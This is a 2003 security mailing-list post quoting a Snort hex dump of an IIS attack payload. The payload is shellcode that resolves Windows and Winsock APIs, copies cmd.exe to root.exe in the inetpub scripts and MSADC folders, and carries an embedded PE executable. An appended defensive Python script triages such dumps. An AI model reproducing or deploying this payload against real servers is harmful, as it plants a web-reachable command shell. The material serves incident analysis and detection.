Security Incidents mailing list archives

strange cmd.exe access


From: Q <quentyn () the-q co uk>
Date: Thu, 29 May 2003 20:10:25 +0100 (BST)

Hi, I saw this packet:

#(3 - 261684) [2003-05-09 19:43:00] [snort/1002]  WEB-IIS cmd.exe access
IPv4: 194.204.X.X -> X.X.X.X
      hlen=5 TOS=0 dlen=1472 ID=57174 flags=0 offset=0 TTL=116
chksum=60435
TCP:  port=27761 -> dport: 80  flags=***A**** seq=915915841
      ack=1210973630 off=5 res=0 win=17184 urp=0 chksum=16151
Payload:  length = 1432

000 : FF 75 FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C   .u..U..E......Gl
010 : 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 FF 75 FC   obalAddAtomA..u.
020 : FF 55 F8 89 45 D4 E8 0C 00 00 00 43 6C 6F 73 65   .U..E......Close
030 : 48 61 6E 64 6C 65 00 FF 75 FC FF 55 F8 89 45 D0   Handle..u..U..E.
040 : E8 08 00 00 00 5F 6C 63 72 65 61 74 00 FF 75 FC   ....._lcreat..u.
050 : FF 55 F8 89 45 CC E8 08 00 00 00 5F 6C 77 72 69   .U..E......_lwri
060 : 74 65 00 FF 75 FC FF 55 F8 89 45 C8 E8 08 00 00   te..u..U..E.....
070 : 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC FF 55 F8 89   ._lclose..u..U..
080 : 45 C4 E8 0E 00 00 00 47 65 74 53 79 73 74 65 6D   E......GetSystem
090 : 54 69 6D 65 00 FF 75 FC FF 55 F8 89 45 C0 E8 0B   Time..u..U..E...
0a0 : 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00 FF 55   ...WS2_32.DLL..U
0b0 : F4 89 45 BC E8 07 00 00 00 73 6F 63 6B 65 74 00   ..E......socket.
0c0 : FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 00 00 63 6C   .u..U..E......cl
0d0 : 6F 73 65 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8   osesocket..u..U.
0e0 : 89 45 B4 E8 0C 00 00 00 69 6F 63 74 6C 73 6F 63   .E......ioctlsoc
0f0 : 6B 65 74 00 FF 75 BC FF 55 F8 89 45 A4 E8 08 00   ket..u..U..E....
100 : 00 00 63 6F 6E 6E 65 63 74 00 FF 75 BC FF 55 F8   ..connect..u..U.
110 : 89 45 B0 E8 07 00 00 00 73 65 6C 65 63 74 00 FF   .E......select..
120 : 75 BC FF 55 F8 89 45 A0 E8 05 00 00 00 73 65 6E   u..U..E......sen
130 : 64 00 FF 75 BC FF 55 F8 89 45 AC E8 05 00 00 00   d..u..U..E......
140 : 72 65 63 76 00 FF 75 BC FF 55 F8 89 45 A8 E8 0C   recv..u..U..E...
150 : 00 00 00 67 65 74 68 6F 73 74 6E 61 6D 65 00 FF   ...gethostname..
160 : 75 BC FF 55 F8 89 45 9C E8 0E 00 00 00 67 65 74   u..U..E......get
170 : 68 6F 73 74 62 79 6E 61 6D 65 00 FF 75 BC FF 55   hostbyname..u..U
180 : F8 89 45 98 E8 10 00 00 00 57 53 41 47 65 74 4C   ..E......WSAGetL
190 : 61 73 74 45 72 72 6F 72 00 FF 75 BC FF 55 F8 89   astError..u..U..
1a0 : 45 94 E8 0B 00 00 00 55 53 45 52 33 32 2E 44 4C   E......USER32.DL
1b0 : 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 00 45 78 69   L..U..E......Exi
1c0 : 74 57 69 6E 64 6F 77 73 45 78 00 FF 75 90 FF 55   tWindowsEx..u..U
1d0 : F8 89 45 8C C3 8B 45 84 69 C0 05 84 08 08 40 89   ..E...E.i.....@.
1e0 : 45 84 8D 84 04 78 56 34 12 F7 D8 C1 C0 08 C3 E8   E....xV4........
1f0 : E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 C3 E8 ED FF   ....<.t.<.t.....
200 : FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 E3 10 E8 DC   ................
210 : FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 E8 B4 FF FF   ................
220 : FF 83 E0 07 E8 20 00 00 00 FF FF FF FF 00 FF FF   ..... ..........
230 : FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 00 FF   ................
240 : FF 00 00 FF FF 00 00 FF FF 59 8B 04 81 23 D8 F7   .........Y...#..
250 : D0 23 85 58 FE FF FF 0B D8 80 FB 7F 74 9F 80 FB   .#.X......t...
260 : E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 68 04 01 00   .t.;.X...t..h...
270 : 00 8D 85 5C FE FF FF 50 FF 55 E0 8D BC 05 5C FE   ...\...P.U....\.
280 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00   .......\CMD.EXE.
290 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A   ^.....cj......d:
2a0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73   \inetpub\scripts
2b0 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D   \root.exe...$...
2c0 : 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 00 00   .\...P.U.j..+...
2d0 : 64 3A 5C 70 72 6F 67 72 61 7E 31 5C 63 6F 6D 6D   d:\progra~1\comm
2e0 : 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 41 44   on~1\system\MSAD
2f0 : 43 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19   C\root.exe...$..
300 : 8D 85 5C FE FF FF 50 FF 55 DC E8 BA 05 00 00 FC   ..\...P.U.......
310 : 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00   MZP.............
320 : B8 00 00 00 00 00 00 00 40 00 1A FC 00 00 01 FC   ........@.......
330 : FC FC FC FC FC 00 00 50 45 00 00 4C 01 03 00 FD   .......PE..L....
340 : 2A 25 29 00 00 00 00 00 00 00 00 E0 00 8F 81 0B   *%).............
350 : 01 02 19 00 04 00 00 00 08 00 00 00 00 00 00 00   ................
360 : 10 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00   ........ ....@..
370 : 10 00 00 00 04 00 00 01 00 00 00 00 00 00 00 03   ................
380 : 00 0A 00 00 00 00 00 00 40 00 00 00 04 00 00 00   ........@.......
390 : 00 00 00 02 00 00 00 00 00 10 00 00 20 00 00 00   ............ ...
3a0 : 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00   ................
3b0 : 00 00 00 00 00 00 00 00 30 00 00 0C 01 FC FC FC   ........0.......
3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
3d0 : 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 10   ................
3e0 : 00 00 00 04 00 00 00 08 00 00 00 00 00 00 00 00   ................
3f0 : 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00   ...... ..`......
400 : 00 00 00 10 00 00 00 20 00 00 00 04 00 00 00 0C   ....... ........
410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00   ..............@.
420 : 00 C0 00 00 00 00 00 00 00 00 00 10 00 00 00 30   ...............0
430 : 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00   ................
440 : 00 00 00 00 00 00 40 00 00 C0 FC FC FC FC FC FC   ......@.........
450 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC   ................
460 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC   ................
470 : FC FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00   ................
480 : 00 00 00 00 00 00 68 04 01 00 00 68 D0 20 40 00   ......h....h. @.
490 : E8 61 01 00 00 8D B8 D0 20 40 00 BE 00 20 40 00   .a...... @... @.
4a0 : A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 4C 01 00 00   ....j.h. @..L...
4b0 : E8 0C 00 00 00 68 C0 27 09 00 E8 31 01 00 00 EB   .....h.'...1....
4c0 : EF 68 D8 24 40 00 68 3F 00 0F 00 6A 00 68 10 20   .h.$@.h?...j.h. 
4d0 : 40 00 68 02 00 00 80 E8 32 01 00 00 0B C0 75 26   @.h.....2.....u&
4e0 : 6A 04 68 54 20 40 00 6A 04 6A 00 68 48 20 40 00   j.hT @.j.j.hH @.
4f0 : FF 35 D8 24 40 00 E8 0D 01 00 00 FF 35 D8 24 40   .5.$@.......5.$@
500 : 00 E8 0E 01 00 00 68 D8 24 40 00 68 3F 00 0F 00   ......h.$@.h?...
510 : 6A 00 68 58 20 40 00 68 02 00 00 80 E8 ED 00 00   j.hX @.h........
520 : 00 0B C0 75 55 BD 9C 20 40 00 E8 4C 00 00 00 BD   ...uU.. @..L....
530 : A8 20 40 00 E8 42 00 00 00 6A 09 68 B8 20 40 00   . @..B...j.h. @.
540 : 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 24 40 00 E8   j.j.h. @..5.$@..
550 : B4 00 00 00 6A 09 68 C4 20 40 00 6A 01 6A 00 68   ....j.h. @.j.j.h
560 : B4 20 40 00 FF 35 D8 24 40 00 E8 99 00 00 00 FF   . @..5.$@.......
570 : 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 05 D0 24 40   5.$@..........$@
580 : 00 00 04 00 00 68 D0 24 40 00 68 D0 20 40 00 68   .....h.$@.h. @.h
590 : D4 24 40 00 6A 00 55 FF                           .$@.j.U.

What is strange is that the cmd.exe / root.exe stuff is halfway through,
with some other code before it.

The IP it hit was not mapped to anything (I believe it is unused), so this
cannot have been part of another TCP conversation.


Any ideas?


--
There should be a sig here, but it got bored and wandered off
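The dump above is the kind of payload an analyst has to triage by hand: a Snort hex dump whose readable parts (API names, a CMD.EXE string, the root.exe paths, an MZ/PE header) are scattered between opcode bytes. The script below is an added example, not code from the poster or the list; it parses the Snort "offset : hex   ascii" layout, merges adjacent lines into contiguous segments so strings never join across gaps, extracts printable strings, matches them against a small indicator list built only from names visible in the post, and locates the embedded MZ header and its PE signature. The indicator categories and the function names are assumptions made for this example, and only ten lines of the post's dump are embedded so the block stays short.

```python
import re
from typing import Dict, List, Tuple

# Excerpt of the Snort payload dump quoted in the post above (format: offset : hex bytes   ascii).
# Only ten of the lines are reproduced; non-adjacent lines become separate segments below.
SNORT_DUMP = r"""
000 : FF 75 FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C   .u..U..E......Gl
010 : 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 FF 75 FC   obalAddAtomA..u.
280 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00   .......\CMD.EXE.
290 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A   ^.....cj......d:
2a0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73   \inetpub\scripts
2b0 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D   \root.exe...$...
300 : 8D 85 5C FE FF FF 50 FF 55 DC E8 BA 05 00 00 FC   ..\...P.U.......
310 : 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00   MZP.............
320 : B8 00 00 00 00 00 00 00 40 00 1A FC 00 00 01 FC   ........@.......
330 : FC FC FC FC FC 00 00 50 45 00 00 4C 01 03 00 FD   .......PE..L....
"""

# Assumed indicator lists for this example, built only from names that appear in the post's dump.
INDICATORS: Dict[str, List[bytes]] = {
    "win32 api names": [b"GlobalAddAtomA", b"CloseHandle", b"_lcreat", b"_lwrite", b"_lclose", b"GetSystemTime"],
    "winsock api names": [b"WS2_32.DLL", b"socket", b"connect", b"recv", b"send"],
    "dropper paths": [b"CMD.EXE", b"root.exe", b"inetpub\\scripts"],
}

Segment = Tuple[int, bytes]  # (absolute offset of first byte, contiguous raw bytes)


def parse_snort_dump(text: str) -> List[Segment]:
    """Turn 'OFF : HH HH ...   ascii' lines into (offset, raw bytes) chunks, one per line."""
    chunks = []
    for line in text.splitlines():
        if " : " not in line:
            continue  # blank line or non-dump text
        off_field, rest = line.split(" : ", 1)
        hex_field = rest.split("   ", 1)[0]  # the ASCII column is separated by three spaces
        data = bytes(int(tok, 16) for tok in hex_field.split())
        chunks.append((int(off_field, 16), data))
    return chunks


def merge_segments(chunks: List[Segment]) -> List[Segment]:
    """Join lines whose offsets are adjacent; a gap in offsets starts a new segment."""
    segments: List[Segment] = []
    for off, data in sorted(chunks):
        if segments and segments[-1][0] + len(segments[-1][1]) == off:
            segments[-1] = (segments[-1][0], segments[-1][1] + data)
        else:
            segments.append((off, data))
    return segments


def extract_strings(segments: List[Segment], min_len: int = 5) -> List[Tuple[int, str]]:
    """Printable ASCII runs of at least min_len bytes, with their absolute offsets."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    found = []
    for base, data in segments:
        for m in pat.finditer(data):
            found.append((base + m.start(), m.group().decode("ascii")))
    return found


def match_indicators(segments: List[Segment]) -> Dict[str, List[Tuple[int, str]]]:
    """First occurrence of each indicator per segment, grouped by category (only categories with hits)."""
    hits: Dict[str, List[Tuple[int, str]]] = {}
    for category, needles in INDICATORS.items():
        for base, data in segments:
            for needle in needles:
                pos = data.find(needle)
                if pos != -1:
                    hits.setdefault(category, []).append((base + pos, needle.decode("ascii")))
    return hits


def find_embedded_pe(segments: List[Segment]) -> List[Tuple[int, int]]:
    """(MZ offset, PE signature offset) pairs. Scans forward for 'PE\\0\\0' instead of
    dereferencing e_lfanew, because a payload-carried header may be truncated or mangled."""
    found = []
    for base, data in segments:
        for m in re.finditer(rb"MZ", data):
            pe_off = data.find(b"PE\x00\x00", m.start())
            if pe_off != -1:
                found.append((base + m.start(), base + pe_off))
    return found


def triage(text: str, min_len: int = 5) -> dict:
    """One-call summary of a Snort payload dump."""
    segs = merge_segments(parse_snort_dump(text))
    return {
        "strings": extract_strings(segs, min_len),
        "indicators": match_indicators(segs),
        "embedded_pe": find_embedded_pe(segs),
    }


if __name__ == "__main__":
    report = triage(SNORT_DUMP)
    for off, s in report["strings"]:
        print(f"string             @0x{off:03x}: {s}")
    for category, cat_hits in report["indicators"].items():
        for off, name in sorted(cat_hits):
            print(f"{category:18s} @0x{off:03x}: {name}")
    for mz, pe in report["embedded_pe"]:
        print(f"MZ header @0x{mz:03x}, PE signature @0x{pe:03x}")
```

Run against the full dump from the post, the string pass also surfaces the WS2_32.DLL import names and the second root.exe path, which is what makes the "other code before it" readable: the first part resolves API names by hand and the second part carries the file it writes. The gap handling matters whenever only part of a dump is pasted into a ticket, since a naive join would fabricate strings across the missing lines.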

